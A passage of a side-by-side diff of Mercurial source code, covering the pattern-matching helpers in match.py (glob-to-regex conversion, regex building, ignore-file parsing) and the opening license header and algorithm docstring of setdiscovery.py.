1057 for m in self._matchers:
1058 v = m.visitdir(dir)
1058 v = m.visitdir(dir)
1059 if v == 'all':
1059 if v == 'all':
1060 return v
1060 return v
1061 r |= v
1061 r |= v
1062 return r
1062 return r
1063
1063
1064 def visitchildrenset(self, dir):
1064 def visitchildrenset(self, dir):
1065 r = set()
1065 r = set()
1066 this = False
1066 this = False
1067 for m in self._matchers:
1067 for m in self._matchers:
1068 v = m.visitchildrenset(dir)
1068 v = m.visitchildrenset(dir)
1069 if not v:
1069 if not v:
1070 continue
1070 continue
1071 if v == 'all':
1071 if v == 'all':
1072 return v
1072 return v
1073 if this or v == 'this':
1073 if this or v == 'this':
1074 this = True
1074 this = True
1075 # don't break, we might have an 'all' in here.
1075 # don't break, we might have an 'all' in here.
1076 continue
1076 continue
1077 assert isinstance(v, set)
1077 assert isinstance(v, set)
1078 r = r.union(v)
1078 r = r.union(v)
1079 if this:
1079 if this:
1080 return 'this'
1080 return 'this'
1081 return r
1081 return r
1082
1082
1083 @encoding.strmethod
1083 @encoding.strmethod
1084 def __repr__(self):
1084 def __repr__(self):
1085 return ('<unionmatcher matchers=%r>' % self._matchers)
1085 return ('<unionmatcher matchers=%r>' % self._matchers)
1086
1086
1087 def patkind(pattern, default=None):
1087 def patkind(pattern, default=None):
1088 '''If pattern is 'kind:pat' with a known kind, return kind.
1088 '''If pattern is 'kind:pat' with a known kind, return kind.
1089
1089
1090 >>> patkind(br're:.*\.c$')
1090 >>> patkind(br're:.*\.c$')
1091 're'
1091 're'
1092 >>> patkind(b'glob:*.c')
1092 >>> patkind(b'glob:*.c')
1093 'glob'
1093 'glob'
1094 >>> patkind(b'relpath:test.py')
1094 >>> patkind(b'relpath:test.py')
1095 'relpath'
1095 'relpath'
1096 >>> patkind(b'main.py')
1096 >>> patkind(b'main.py')
1097 >>> patkind(b'main.py', default=b're')
1097 >>> patkind(b'main.py', default=b're')
1098 're'
1098 're'
1099 '''
1099 '''
1100 return _patsplit(pattern, default)[0]
1100 return _patsplit(pattern, default)[0]
1101
1101
1102 def _patsplit(pattern, default):
1102 def _patsplit(pattern, default):
1103 """Split a string into the optional pattern kind prefix and the actual
1103 """Split a string into the optional pattern kind prefix and the actual
1104 pattern."""
1104 pattern."""
1105 if ':' in pattern:
1105 if ':' in pattern:
1106 kind, pat = pattern.split(':', 1)
1106 kind, pat = pattern.split(':', 1)
1107 if kind in allpatternkinds:
1107 if kind in allpatternkinds:
1108 return kind, pat
1108 return kind, pat
1109 return default, pattern
1109 return default, pattern
1110
1110
1111 def _globre(pat):
1111 def _globre(pat):
1112 r'''Convert an extended glob string to a regexp string.
1112 r'''Convert an extended glob string to a regexp string.
1113
1113
1114 >>> from . import pycompat
1114 >>> from . import pycompat
1115 >>> def bprint(s):
1115 >>> def bprint(s):
1116 ... print(pycompat.sysstr(s))
1116 ... print(pycompat.sysstr(s))
1117 >>> bprint(_globre(br'?'))
1117 >>> bprint(_globre(br'?'))
1118 .
1118 .
1119 >>> bprint(_globre(br'*'))
1119 >>> bprint(_globre(br'*'))
1120 [^/]*
1120 [^/]*
1121 >>> bprint(_globre(br'**'))
1121 >>> bprint(_globre(br'**'))
1122 .*
1122 .*
1123 >>> bprint(_globre(br'**/a'))
1123 >>> bprint(_globre(br'**/a'))
1124 (?:.*/)?a
1124 (?:.*/)?a
1125 >>> bprint(_globre(br'a/**/b'))
1125 >>> bprint(_globre(br'a/**/b'))
1126 a/(?:.*/)?b
1126 a/(?:.*/)?b
1127 >>> bprint(_globre(br'[a*?!^][^b][!c]'))
1127 >>> bprint(_globre(br'[a*?!^][^b][!c]'))
1128 [a*?!^][\^b][^c]
1128 [a*?!^][\^b][^c]
1129 >>> bprint(_globre(br'{a,b}'))
1129 >>> bprint(_globre(br'{a,b}'))
1130 (?:a|b)
1130 (?:a|b)
1131 >>> bprint(_globre(br'.\*\?'))
1131 >>> bprint(_globre(br'.\*\?'))
1132 \.\*\?
1132 \.\*\?
1133 '''
1133 '''
1134 i, n = 0, len(pat)
1134 i, n = 0, len(pat)
1135 res = ''
1135 res = ''
1136 group = 0
1136 group = 0
1137 escape = util.stringutil.regexbytesescapemap.get
1137 escape = util.stringutil.regexbytesescapemap.get
1138 def peek():
1138 def peek():
1139 return i < n and pat[i:i + 1]
1139 return i < n and pat[i:i + 1]
1140 while i < n:
1140 while i < n:
1141 c = pat[i:i + 1]
1141 c = pat[i:i + 1]
1142 i += 1
1142 i += 1
1143 if c not in '*?[{},\\':
1143 if c not in '*?[{},\\':
1144 res += escape(c, c)
1144 res += escape(c, c)
1145 elif c == '*':
1145 elif c == '*':
1146 if peek() == '*':
1146 if peek() == '*':
1147 i += 1
1147 i += 1
1148 if peek() == '/':
1148 if peek() == '/':
1149 i += 1
1149 i += 1
1150 res += '(?:.*/)?'
1150 res += '(?:.*/)?'
1151 else:
1151 else:
1152 res += '.*'
1152 res += '.*'
1153 else:
1153 else:
1154 res += '[^/]*'
1154 res += '[^/]*'
1155 elif c == '?':
1155 elif c == '?':
1156 res += '.'
1156 res += '.'
1157 elif c == '[':
1157 elif c == '[':
1158 j = i
1158 j = i
1159 if j < n and pat[j:j + 1] in '!]':
1159 if j < n and pat[j:j + 1] in '!]':
1160 j += 1
1160 j += 1
1161 while j < n and pat[j:j + 1] != ']':
1161 while j < n and pat[j:j + 1] != ']':
1162 j += 1
1162 j += 1
1163 if j >= n:
1163 if j >= n:
1164 res += '\\['
1164 res += '\\['
1165 else:
1165 else:
1166 stuff = pat[i:j].replace('\\','\\\\')
1166 stuff = pat[i:j].replace('\\','\\\\')
1167 i = j + 1
1167 i = j + 1
1168 if stuff[0:1] == '!':
1168 if stuff[0:1] == '!':
1169 stuff = '^' + stuff[1:]
1169 stuff = '^' + stuff[1:]
1170 elif stuff[0:1] == '^':
1170 elif stuff[0:1] == '^':
1171 stuff = '\\' + stuff
1171 stuff = '\\' + stuff
1172 res = '%s[%s]' % (res, stuff)
1172 res = '%s[%s]' % (res, stuff)
1173 elif c == '{':
1173 elif c == '{':
1174 group += 1
1174 group += 1
1175 res += '(?:'
1175 res += '(?:'
1176 elif c == '}' and group:
1176 elif c == '}' and group:
1177 res += ')'
1177 res += ')'
1178 group -= 1
1178 group -= 1
1179 elif c == ',' and group:
1179 elif c == ',' and group:
1180 res += '|'
1180 res += '|'
1181 elif c == '\\':
1181 elif c == '\\':
1182 p = peek()
1182 p = peek()
1183 if p:
1183 if p:
1184 i += 1
1184 i += 1
1185 res += escape(p, p)
1185 res += escape(p, p)
1186 else:
1186 else:
1187 res += escape(c, c)
1187 res += escape(c, c)
1188 else:
1188 else:
1189 res += escape(c, c)
1189 res += escape(c, c)
1190 return res
1190 return res
1191
1191
1192 def _regex(kind, pat, globsuffix):
1192 def _regex(kind, pat, globsuffix):
1193 '''Convert a (normalized) pattern of any kind into a
1193 '''Convert a (normalized) pattern of any kind into a
1194 regular expression.
1194 regular expression.
1195 globsuffix is appended to the regexp of globs.'''
1195 globsuffix is appended to the regexp of globs.'''
1196
1196
1197 if rustmod is not None:
1197 if rustmod is not None:
1198 try:
1198 try:
1199 return rustmod.build_single_regex(
1199 return rustmod.build_single_regex(
1200 kind,
1200 kind,
1201 pat,
1201 pat,
1202 globsuffix
1202 globsuffix
1203 )
1203 )
1204 except rustmod.PatternError:
1204 except rustmod.PatternError:
1205 raise error.ProgrammingError(
1205 raise error.ProgrammingError(
1206 'not a regex pattern: %s:%s' % (kind, pat)
1206 'not a regex pattern: %s:%s' % (kind, pat)
1207 )
1207 )
1208
1208
1209 if not pat and kind in ('glob', 'relpath'):
1209 if not pat and kind in ('glob', 'relpath'):
1210 return ''
1210 return ''
1211 if kind == 're':
1211 if kind == 're':
1212 return pat
1212 return pat
1213 if kind in ('path', 'relpath'):
1213 if kind in ('path', 'relpath'):
1214 if pat == '.':
1214 if pat == '.':
1215 return ''
1215 return ''
1216 return util.stringutil.reescape(pat) + '(?:/|$)'
1216 return util.stringutil.reescape(pat) + '(?:/|$)'
1217 if kind == 'rootfilesin':
1217 if kind == 'rootfilesin':
1218 if pat == '.':
1218 if pat == '.':
1219 escaped = ''
1219 escaped = ''
1220 else:
1220 else:
1221 # Pattern is a directory name.
1221 # Pattern is a directory name.
1222 escaped = util.stringutil.reescape(pat) + '/'
1222 escaped = util.stringutil.reescape(pat) + '/'
1223 # Anything after the pattern must be a non-directory.
1223 # Anything after the pattern must be a non-directory.
1224 return escaped + '[^/]+$'
1224 return escaped + '[^/]+$'
1225 if kind == 'relglob':
1225 if kind == 'relglob':
1226 return '(?:|.*/)' + _globre(pat) + globsuffix
1226 return '(?:|.*/)' + _globre(pat) + globsuffix
1227 if kind == 'relre':
1227 if kind == 'relre':
1228 if pat.startswith('^'):
1228 if pat.startswith('^'):
1229 return pat
1229 return pat
1230 return '.*' + pat
1230 return '.*' + pat
1231 if kind in ('glob', 'rootglob'):
1231 if kind in ('glob', 'rootglob'):
1232 return _globre(pat) + globsuffix
1232 return _globre(pat) + globsuffix
1233 raise error.ProgrammingError('not a regex pattern: %s:%s' % (kind, pat))
1233 raise error.ProgrammingError('not a regex pattern: %s:%s' % (kind, pat))
1234
1234
1235 def _buildmatch(kindpats, globsuffix, root):
1235 def _buildmatch(kindpats, globsuffix, root):
1236 '''Return regexp string and a matcher function for kindpats.
1236 '''Return regexp string and a matcher function for kindpats.
1237 globsuffix is appended to the regexp of globs.'''
1237 globsuffix is appended to the regexp of globs.'''
1238 matchfuncs = []
1238 matchfuncs = []
1239
1239
1240 subincludes, kindpats = _expandsubinclude(kindpats, root)
1240 subincludes, kindpats = _expandsubinclude(kindpats, root)
1241 if subincludes:
1241 if subincludes:
1242 submatchers = {}
1242 submatchers = {}
1243 def matchsubinclude(f):
1243 def matchsubinclude(f):
1244 for prefix, matcherargs in subincludes:
1244 for prefix, matcherargs in subincludes:
1245 if f.startswith(prefix):
1245 if f.startswith(prefix):
1246 mf = submatchers.get(prefix)
1246 mf = submatchers.get(prefix)
1247 if mf is None:
1247 if mf is None:
1248 mf = match(*matcherargs)
1248 mf = match(*matcherargs)
1249 submatchers[prefix] = mf
1249 submatchers[prefix] = mf
1250
1250
1251 if mf(f[len(prefix):]):
1251 if mf(f[len(prefix):]):
1252 return True
1252 return True
1253 return False
1253 return False
1254 matchfuncs.append(matchsubinclude)
1254 matchfuncs.append(matchsubinclude)
1255
1255
1256 regex = ''
1256 regex = ''
1257 if kindpats:
1257 if kindpats:
1258 if all(k == 'rootfilesin' for k, p, s in kindpats):
1258 if all(k == 'rootfilesin' for k, p, s in kindpats):
1259 dirs = {p for k, p, s in kindpats}
1259 dirs = {p for k, p, s in kindpats}
1260 def mf(f):
1260 def mf(f):
1261 i = f.rfind('/')
1261 i = f.rfind('/')
1262 if i >= 0:
1262 if i >= 0:
1263 dir = f[:i]
1263 dir = f[:i]
1264 else:
1264 else:
1265 dir = '.'
1265 dir = '.'
1266 return dir in dirs
1266 return dir in dirs
1267 regex = b'rootfilesin: %s' % stringutil.pprint(list(sorted(dirs)))
1267 regex = b'rootfilesin: %s' % stringutil.pprint(list(sorted(dirs)))
1268 matchfuncs.append(mf)
1268 matchfuncs.append(mf)
1269 else:
1269 else:
1270 regex, mf = _buildregexmatch(kindpats, globsuffix)
1270 regex, mf = _buildregexmatch(kindpats, globsuffix)
1271 matchfuncs.append(mf)
1271 matchfuncs.append(mf)
1272
1272
1273 if len(matchfuncs) == 1:
1273 if len(matchfuncs) == 1:
1274 return regex, matchfuncs[0]
1274 return regex, matchfuncs[0]
1275 else:
1275 else:
1276 return regex, lambda f: any(mf(f) for mf in matchfuncs)
1276 return regex, lambda f: any(mf(f) for mf in matchfuncs)
1277
1277
1278 MAX_RE_SIZE = 20000
1278 MAX_RE_SIZE = 20000
1279
1279
1280 def _joinregexes(regexps):
1280 def _joinregexes(regexps):
1281 """gather multiple regular expressions into a single one"""
1281 """gather multiple regular expressions into a single one"""
1282 return '|'.join(regexps)
1282 return '|'.join(regexps)
1283
1283
1284 def _buildregexmatch(kindpats, globsuffix):
1284 def _buildregexmatch(kindpats, globsuffix):
1285 """Build a match function from a list of kinds and kindpats,
1285 """Build a match function from a list of kinds and kindpats,
1286 return regexp string and a matcher function.
1286 return regexp string and a matcher function.
1287
1287
1288 Test too large input
1288 Test too large input
1289 >>> _buildregexmatch([
1289 >>> _buildregexmatch([
1290 ... (b'relglob', b'?' * MAX_RE_SIZE, b'')
1290 ... (b'relglob', b'?' * MAX_RE_SIZE, b'')
1291 ... ], b'$')
1291 ... ], b'$')
1292 Traceback (most recent call last):
1292 Traceback (most recent call last):
1293 ...
1293 ...
1294 Abort: matcher pattern is too long (20009 bytes)
1294 Abort: matcher pattern is too long (20009 bytes)
1295 """
1295 """
1296 try:
1296 try:
1297 allgroups = []
1297 allgroups = []
1298 regexps = [_regex(k, p, globsuffix) for (k, p, s) in kindpats]
1298 regexps = [_regex(k, p, globsuffix) for (k, p, s) in kindpats]
1299 fullregexp = _joinregexes(regexps)
1299 fullregexp = _joinregexes(regexps)
1300
1300
1301 startidx = 0
1301 startidx = 0
1302 groupsize = 0
1302 groupsize = 0
1303 for idx, r in enumerate(regexps):
1303 for idx, r in enumerate(regexps):
1304 piecesize = len(r)
1304 piecesize = len(r)
1305 if piecesize > MAX_RE_SIZE:
1305 if piecesize > MAX_RE_SIZE:
1306 msg = _("matcher pattern is too long (%d bytes)") % piecesize
1306 msg = _("matcher pattern is too long (%d bytes)") % piecesize
1307 raise error.Abort(msg)
1307 raise error.Abort(msg)
1308 elif (groupsize + piecesize) > MAX_RE_SIZE:
1308 elif (groupsize + piecesize) > MAX_RE_SIZE:
1309 group = regexps[startidx:idx]
1309 group = regexps[startidx:idx]
1310 allgroups.append(_joinregexes(group))
1310 allgroups.append(_joinregexes(group))
1311 startidx = idx
1311 startidx = idx
1312 groupsize = 0
1312 groupsize = 0
1313 groupsize += piecesize + 1
1313 groupsize += piecesize + 1
1314
1314
1315 if startidx == 0:
1315 if startidx == 0:
1316 matcher = _rematcher(fullregexp)
1316 matcher = _rematcher(fullregexp)
1317 func = lambda s: bool(matcher(s))
1317 func = lambda s: bool(matcher(s))
1318 else:
1318 else:
1319 group = regexps[startidx:]
1319 group = regexps[startidx:]
1320 allgroups.append(_joinregexes(group))
1320 allgroups.append(_joinregexes(group))
1321 allmatchers = [_rematcher(g) for g in allgroups]
1321 allmatchers = [_rematcher(g) for g in allgroups]
1322 func = lambda s: any(m(s) for m in allmatchers)
1322 func = lambda s: any(m(s) for m in allmatchers)
1323 return fullregexp, func
1323 return fullregexp, func
1324 except re.error:
1324 except re.error:
1325 for k, p, s in kindpats:
1325 for k, p, s in kindpats:
1326 try:
1326 try:
1327 _rematcher(_regex(k, p, globsuffix))
1327 _rematcher(_regex(k, p, globsuffix))
1328 except re.error:
1328 except re.error:
1329 if s:
1329 if s:
1330 raise error.Abort(_("%s: invalid pattern (%s): %s") %
1330 raise error.Abort(_("%s: invalid pattern (%s): %s") %
1331 (s, k, p))
1331 (s, k, p))
1332 else:
1332 else:
1333 raise error.Abort(_("invalid pattern (%s): %s") % (k, p))
1333 raise error.Abort(_("invalid pattern (%s): %s") % (k, p))
1334 raise error.Abort(_("invalid pattern"))
1334 raise error.Abort(_("invalid pattern"))
1335
1335
1336 def _patternrootsanddirs(kindpats):
1336 def _patternrootsanddirs(kindpats):
1337 '''Returns roots and directories corresponding to each pattern.
1337 '''Returns roots and directories corresponding to each pattern.
1338
1338
1339 This calculates the roots and directories exactly matching the patterns and
1339 This calculates the roots and directories exactly matching the patterns and
1340 returns a tuple of (roots, dirs) for each. It does not return other
1340 returns a tuple of (roots, dirs) for each. It does not return other
1341 directories which may also need to be considered, like the parent
1341 directories which may also need to be considered, like the parent
1342 directories.
1342 directories.
1343 '''
1343 '''
1344 r = []
1344 r = []
1345 d = []
1345 d = []
1346 for kind, pat, source in kindpats:
1346 for kind, pat, source in kindpats:
1347 if kind in ('glob', 'rootglob'): # find the non-glob prefix
1347 if kind in ('glob', 'rootglob'): # find the non-glob prefix
1348 root = []
1348 root = []
1349 for p in pat.split('/'):
1349 for p in pat.split('/'):
1350 if '[' in p or '{' in p or '*' in p or '?' in p:
1350 if '[' in p or '{' in p or '*' in p or '?' in p:
1351 break
1351 break
1352 root.append(p)
1352 root.append(p)
1353 r.append('/'.join(root))
1353 r.append('/'.join(root))
1354 elif kind in ('relpath', 'path'):
1354 elif kind in ('relpath', 'path'):
1355 if pat == '.':
1355 if pat == '.':
1356 pat = ''
1356 pat = ''
1357 r.append(pat)
1357 r.append(pat)
1358 elif kind in ('rootfilesin',):
1358 elif kind in ('rootfilesin',):
1359 if pat == '.':
1359 if pat == '.':
1360 pat = ''
1360 pat = ''
1361 d.append(pat)
1361 d.append(pat)
1362 else: # relglob, re, relre
1362 else: # relglob, re, relre
1363 r.append('')
1363 r.append('')
1364 return r, d
1364 return r, d
1365
1365
1366 def _roots(kindpats):
1366 def _roots(kindpats):
1367 '''Returns root directories to match recursively from the given patterns.'''
1367 '''Returns root directories to match recursively from the given patterns.'''
1368 roots, dirs = _patternrootsanddirs(kindpats)
1368 roots, dirs = _patternrootsanddirs(kindpats)
1369 return roots
1369 return roots
1370
1370
1371 def _rootsdirsandparents(kindpats):
1371 def _rootsdirsandparents(kindpats):
1372 '''Returns roots and exact directories from patterns.
1372 '''Returns roots and exact directories from patterns.
1373
1373
1374 `roots` are directories to match recursively, `dirs` should
1374 `roots` are directories to match recursively, `dirs` should
1375 be matched non-recursively, and `parents` are the implicitly required
1375 be matched non-recursively, and `parents` are the implicitly required
1376 directories to walk to items in either roots or dirs.
1376 directories to walk to items in either roots or dirs.
1377
1377
1378 Returns a tuple of (roots, dirs, parents).
1378 Returns a tuple of (roots, dirs, parents).
1379
1379
1380 >>> r = _rootsdirsandparents(
1380 >>> r = _rootsdirsandparents(
1381 ... [(b'glob', b'g/h/*', b''), (b'glob', b'g/h', b''),
1381 ... [(b'glob', b'g/h/*', b''), (b'glob', b'g/h', b''),
1382 ... (b'glob', b'g*', b'')])
1382 ... (b'glob', b'g*', b'')])
1383 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1383 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1384 (['g/h', 'g/h', ''], []) ['', 'g']
1384 (['g/h', 'g/h', ''], []) ['', 'g']
1385 >>> r = _rootsdirsandparents(
1385 >>> r = _rootsdirsandparents(
1386 ... [(b'rootfilesin', b'g/h', b''), (b'rootfilesin', b'', b'')])
1386 ... [(b'rootfilesin', b'g/h', b''), (b'rootfilesin', b'', b'')])
1387 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1387 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1388 ([], ['g/h', '']) ['', 'g']
1388 ([], ['g/h', '']) ['', 'g']
1389 >>> r = _rootsdirsandparents(
1389 >>> r = _rootsdirsandparents(
1390 ... [(b'relpath', b'r', b''), (b'path', b'p/p', b''),
1390 ... [(b'relpath', b'r', b''), (b'path', b'p/p', b''),
1391 ... (b'path', b'', b'')])
1391 ... (b'path', b'', b'')])
1392 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1392 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1393 (['r', 'p/p', ''], []) ['', 'p']
1393 (['r', 'p/p', ''], []) ['', 'p']
1394 >>> r = _rootsdirsandparents(
1394 >>> r = _rootsdirsandparents(
1395 ... [(b'relglob', b'rg*', b''), (b're', b're/', b''),
1395 ... [(b'relglob', b'rg*', b''), (b're', b're/', b''),
1396 ... (b'relre', b'rr', b'')])
1396 ... (b'relre', b'rr', b'')])
1397 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1397 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1398 (['', '', ''], []) ['']
1398 (['', '', ''], []) ['']
1399 '''
1399 '''
1400 r, d = _patternrootsanddirs(kindpats)
1400 r, d = _patternrootsanddirs(kindpats)
1401
1401
1402 p = set()
1402 p = set()
1403 # Add the parents as non-recursive/exact directories, since they must be
1403 # Add the parents as non-recursive/exact directories, since they must be
1404 # scanned to get to either the roots or the other exact directories.
1404 # scanned to get to either the roots or the other exact directories.
1405 p.update(util.dirs(d))
1405 p.update(util.dirs(d))
1406 p.update(util.dirs(r))
1406 p.update(util.dirs(r))
1407
1407
1408 # FIXME: all uses of this function convert these to sets, do so before
1408 # FIXME: all uses of this function convert these to sets, do so before
1409 # returning.
1409 # returning.
1410 # FIXME: all uses of this function do not need anything in 'roots' and
1410 # FIXME: all uses of this function do not need anything in 'roots' and
1411 # 'dirs' to also be in 'parents', consider removing them before returning.
1411 # 'dirs' to also be in 'parents', consider removing them before returning.
1412 return r, d, p
1412 return r, d, p
1413
1413
1414 def _explicitfiles(kindpats):
1414 def _explicitfiles(kindpats):
1415 '''Returns the potential explicit filenames from the patterns.
1415 '''Returns the potential explicit filenames from the patterns.
1416
1416
1417 >>> _explicitfiles([(b'path', b'foo/bar', b'')])
1417 >>> _explicitfiles([(b'path', b'foo/bar', b'')])
1418 ['foo/bar']
1418 ['foo/bar']
1419 >>> _explicitfiles([(b'rootfilesin', b'foo/bar', b'')])
1419 >>> _explicitfiles([(b'rootfilesin', b'foo/bar', b'')])
1420 []
1420 []
1421 '''
1421 '''
1422 # Keep only the pattern kinds where one can specify filenames (vs only
1422 # Keep only the pattern kinds where one can specify filenames (vs only
1423 # directory names).
1423 # directory names).
1424 filable = [kp for kp in kindpats if kp[0] not in ('rootfilesin',)]
1424 filable = [kp for kp in kindpats if kp[0] not in ('rootfilesin',)]
1425 return _roots(filable)
1425 return _roots(filable)
1426
1426
1427 def _prefix(kindpats):
1427 def _prefix(kindpats):
1428 '''Whether all the patterns match a prefix (i.e. recursively)'''
1428 '''Whether all the patterns match a prefix (i.e. recursively)'''
1429 for kind, pat, source in kindpats:
1429 for kind, pat, source in kindpats:
1430 if kind not in ('path', 'relpath'):
1430 if kind not in ('path', 'relpath'):
1431 return False
1431 return False
1432 return True
1432 return True
1433
1433
1434 _commentre = None
1434 _commentre = None
1435
1435
1436 def readpatternfile(filepath, warn, sourceinfo=False):
1436 def readpatternfile(filepath, warn, sourceinfo=False):
1437 '''parse a pattern file, returning a list of
1437 '''parse a pattern file, returning a list of
1438 patterns. These patterns should be given to compile()
1438 patterns. These patterns should be given to compile()
1439 to be validated and converted into a match function.
1439 to be validated and converted into a match function.
1440
1440
1441 trailing white space is dropped.
1441 trailing white space is dropped.
1442 the escape character is backslash.
1442 the escape character is backslash.
1443 comments start with #.
1443 comments start with #.
1444 empty lines are skipped.
1444 empty lines are skipped.
1445
1445
1446 lines can be of the following formats:
1446 lines can be of the following formats:
1447
1447
1448 syntax: regexp # defaults following lines to non-rooted regexps
1448 syntax: regexp # defaults following lines to non-rooted regexps
1449 syntax: glob # defaults following lines to non-rooted globs
1449 syntax: glob # defaults following lines to non-rooted globs
1450 re:pattern # non-rooted regular expression
1450 re:pattern # non-rooted regular expression
1451 glob:pattern # non-rooted glob
1451 glob:pattern # non-rooted glob
1452 rootglob:pat # rooted glob (same root as ^ in regexps)
1452 rootglob:pat # rooted glob (same root as ^ in regexps)
1453 pattern # pattern of the current default type
1453 pattern # pattern of the current default type
1454
1454
1455 if sourceinfo is set, returns a list of tuples:
1455 if sourceinfo is set, returns a list of tuples:
1456 (pattern, lineno, originalline).
1456 (pattern, lineno, originalline).
1457 This is useful to debug ignore patterns.
1457 This is useful to debug ignore patterns.
1458 '''
1458 '''
1459
1459
1460 if rustmod is not None:
1460 if rustmod is not None:
1461 result, warnings = rustmod.read_pattern_file(
1461 result, warnings = rustmod.read_pattern_file(
1462 filepath,
1462 filepath,
1463 bool(warn),
1463 bool(warn),
1464 sourceinfo,
1464 sourceinfo,
1465 )
1465 )
1466
1466
1467 for warning_params in warnings:
1467 for warning_params in warnings:
1468 # Can't be easily emitted from Rust, because it would require
1468 # Can't be easily emitted from Rust, because it would require
1469 # a mechanism for both gettext and calling the `warn` function.
1469 # a mechanism for both gettext and calling the `warn` function.
1470 warn(_("%s: ignoring invalid syntax '%s'\n") % warning_params)
1470 warn(_("%s: ignoring invalid syntax '%s'\n") % warning_params)
1471
1471
1472 return result
1472 return result
1473
1473
1474 syntaxes = {
1474 syntaxes = {
1475 're': 'relre:',
1475 're': 'relre:',
1476 'regexp': 'relre:',
1476 'regexp': 'relre:',
1477 'glob': 'relglob:',
1477 'glob': 'relglob:',
1478 'rootglob': 'rootglob:',
1478 'rootglob': 'rootglob:',
1479 'include': 'include',
1479 'include': 'include',
1480 'subinclude': 'subinclude',
1480 'subinclude': 'subinclude',
1481 }
1481 }
1482 syntax = 'relre:'
1482 syntax = 'relre:'
1483 patterns = []
1483 patterns = []
1484
1484
1485 fp = open(filepath, 'rb')
1485 fp = open(filepath, 'rb')
1486 for lineno, line in enumerate(util.iterfile(fp), start=1):
1486 for lineno, line in enumerate(util.iterfile(fp), start=1):
1487 if "#" in line:
1487 if "#" in line:
1488 global _commentre
1488 global _commentre
1489 if not _commentre:
1489 if not _commentre:
1490 _commentre = util.re.compile(br'((?:^|[^\\])(?:\\\\)*)#.*')
1490 _commentre = util.re.compile(br'((?:^|[^\\])(?:\\\\)*)#.*')
1491 # remove comments prefixed by an even number of escapes
1491 # remove comments prefixed by an even number of escapes
1492 m = _commentre.search(line)
1492 m = _commentre.search(line)
1493 if m:
1493 if m:
1494 line = line[:m.end(1)]
1494 line = line[:m.end(1)]
1495 # fixup properly escaped comments that survived the above
1495 # fixup properly escaped comments that survived the above
1496 line = line.replace("\\#", "#")
1496 line = line.replace("\\#", "#")
1497 line = line.rstrip()
1497 line = line.rstrip()
1498 if not line:
1498 if not line:
1499 continue
1499 continue
1500
1500
1501 if line.startswith('syntax:'):
1501 if line.startswith('syntax:'):
1502 s = line[7:].strip()
1502 s = line[7:].strip()
1503 try:
1503 try:
1504 syntax = syntaxes[s]
1504 syntax = syntaxes[s]
1505 except KeyError:
1505 except KeyError:
1506 if warn:
1506 if warn:
1507 warn(_("%s: ignoring invalid syntax '%s'\n") %
1507 warn(_("%s: ignoring invalid syntax '%s'\n") %
1508 (filepath, s))
1508 (filepath, s))
1509 continue
1509 continue
1510
1510
1511 linesyntax = syntax
1511 linesyntax = syntax
1512 for s, rels in syntaxes.iteritems():
1512 for s, rels in syntaxes.iteritems():
1513 if line.startswith(rels):
1513 if line.startswith(rels):
1514 linesyntax = rels
1514 linesyntax = rels
1515 line = line[len(rels):]
1515 line = line[len(rels):]
1516 break
1516 break
1517 elif line.startswith(s+':'):
1517 elif line.startswith(s+':'):
1518 linesyntax = rels
1518 linesyntax = rels
1519 line = line[len(s) + 1:]
1519 line = line[len(s) + 1:]
1520 break
1520 break
1521 if sourceinfo:
1521 if sourceinfo:
1522 patterns.append((linesyntax + line, lineno, line))
1522 patterns.append((linesyntax + line, lineno, line))
1523 else:
1523 else:
1524 patterns.append(linesyntax + line)
1524 patterns.append(linesyntax + line)
1525 fp.close()
1525 fp.close()
1526 return patterns
1526 return patterns
@@ -1,463 +1,463 b''
1 # setdiscovery.py - improved discovery of common nodeset for mercurial
1 # setdiscovery.py - improved discovery of common nodeset for mercurial
2 #
2 #
3 # Copyright 2010 Benoit Boissinot <bboissin@gmail.com>
3 # Copyright 2010 Benoit Boissinot <bboissin@gmail.com>
4 # and Peter Arrenbrecht <peter@arrenbrecht.ch>
4 # and Peter Arrenbrecht <peter@arrenbrecht.ch>
5 #
5 #
6 # This software may be used and distributed according to the terms of the
6 # This software may be used and distributed according to the terms of the
7 # GNU General Public License version 2 or any later version.
7 # GNU General Public License version 2 or any later version.
8 """
8 """
9 Algorithm works in the following way. You have two repository: local and
9 Algorithm works in the following way. You have two repository: local and
10 remote. They both contains a DAG of changelists.
10 remote. They both contains a DAG of changelists.
11
11
12 The goal of the discovery protocol is to find one set of node *common*,
12 The goal of the discovery protocol is to find one set of node *common*,
13 the set of nodes shared by local and remote.
13 the set of nodes shared by local and remote.
14
14
15 One of the issue with the original protocol was latency, it could
15 One of the issue with the original protocol was latency, it could
16 potentially require lots of roundtrips to discover that the local repo was a
16 potentially require lots of roundtrips to discover that the local repo was a
17 subset of remote (which is a very common case, you usually have few changes
17 subset of remote (which is a very common case, you usually have few changes
18 compared to upstream, while upstream probably had lots of development).
18 compared to upstream, while upstream probably had lots of development).
19
19
20 The new protocol only requires one interface for the remote repo: `known()`,
20 The new protocol only requires one interface for the remote repo: `known()`,
21 which given a set of changelists tells you if they are present in the DAG.
21 which given a set of changelists tells you if they are present in the DAG.
22
22
23 The algorithm then works as follow:
23 The algorithm then works as follow:
24
24
25 - We will be using three sets, `common`, `missing`, `unknown`. Originally
25 - We will be using three sets, `common`, `missing`, `unknown`. Originally
26 all nodes are in `unknown`.
26 all nodes are in `unknown`.
27 - Take a sample from `unknown`, call `remote.known(sample)`
27 - Take a sample from `unknown`, call `remote.known(sample)`
28 - For each node that remote knows, move it and all its ancestors to `common`
28 - For each node that remote knows, move it and all its ancestors to `common`
29 - For each node that remote doesn't know, move it and all its descendants
29 - For each node that remote doesn't know, move it and all its descendants
30 to `missing`
30 to `missing`
31 - Iterate until `unknown` is empty
31 - Iterate until `unknown` is empty
32
32
33 There are a couple optimizations, first is instead of starting with a random
33 There are a couple optimizations, first is instead of starting with a random
34 sample of missing, start by sending all heads, in the case where the local
34 sample of missing, start by sending all heads, in the case where the local
35 repo is a subset, you computed the answer in one round trip.
35 repo is a subset, you computed the answer in one round trip.
36
36
37 Then you can do something similar to the bisecting strategy used when
37 Then you can do something similar to the bisecting strategy used when
38 finding faulty changesets. Instead of random samples, you can try picking
38 finding faulty changesets. Instead of random samples, you can try picking
39 nodes that will maximize the number of nodes that will be
39 nodes that will maximize the number of nodes that will be
